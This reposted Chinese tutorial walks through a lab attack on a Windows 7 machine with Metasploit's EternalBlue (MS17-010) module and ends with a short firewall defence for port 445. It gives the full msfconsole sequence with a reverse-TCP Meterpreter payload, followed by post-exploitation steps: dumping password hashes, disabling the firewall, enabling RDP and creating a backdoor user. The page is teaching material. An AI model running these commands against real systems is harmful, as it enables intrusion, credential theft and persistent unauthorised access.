文章来源: 疯猫网络
一、环境配置(两台主机均采用 NAT 桥接模式)
1、Kali 主机的 IP 配置:
2、Windows7 主机的 IP 配置:
3.查看 Win7 主机打开的端口
二、利用 MSF 框架对 Win7 进行永恒之蓝渗透【实战篇】
1、启用 msfconsole 攻击平台
2、查找目标主机的漏洞编号
3、使用永恒之蓝漏洞模块
4、设置 Payload
5、查看 Payload 的设置情况
6、实施攻击
msf5 > search ms17_010msf5 > use exploit/windows/smb/ms17_010_eternalbluemsf5 exploit(windows/smb/ms17_010_eternalblue) > set payloadwindows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.100.131rhost => 192.168.100.131msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.100.128lhost => 192.168.100.128msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 1234msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
7、攻入目标主机
8、查看目标主机的操作系统信息
9、对目标主机的屏幕进行截图
10、查看目标主机所有的用户名和密码(密码显示为 hash 值)
11、关闭防火墙
12、关闭 Telnet 服务
net stop TlntSvr
13、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况
(1)方法 1:run getgui -e
(2)方法 2:run post/windows/manage/enable_rdp
14、创建系统用户
run getgui –u test –p 123456
三、利用 MSF 框架对 Win7 进行永恒之蓝渗透【防御篇】
1、在打开 445 端口的前提下,利用系统自带的防火墙进行规则过滤
微信搜索公众号:前端技术编程,回复:前端 领取资料 。
1)在 win7 上打开防火墙设置窗口,并启用防火墙
2)没有设置防火墙过滤规则前用 Nmap 对目标主机进行端口扫描
3)针对 445 端口设置过滤规则
4)设置防火墙过滤规则后的端口扫描
5)目标主机设置针对 445 端口的过滤规则后,kali 再对目标主机实施攻击
版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权,烦请告知,我们会立即删除并致歉!
原文始发于微信公众号(程序员阿甘):用永恒之蓝漏洞入侵渗透 Win7!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论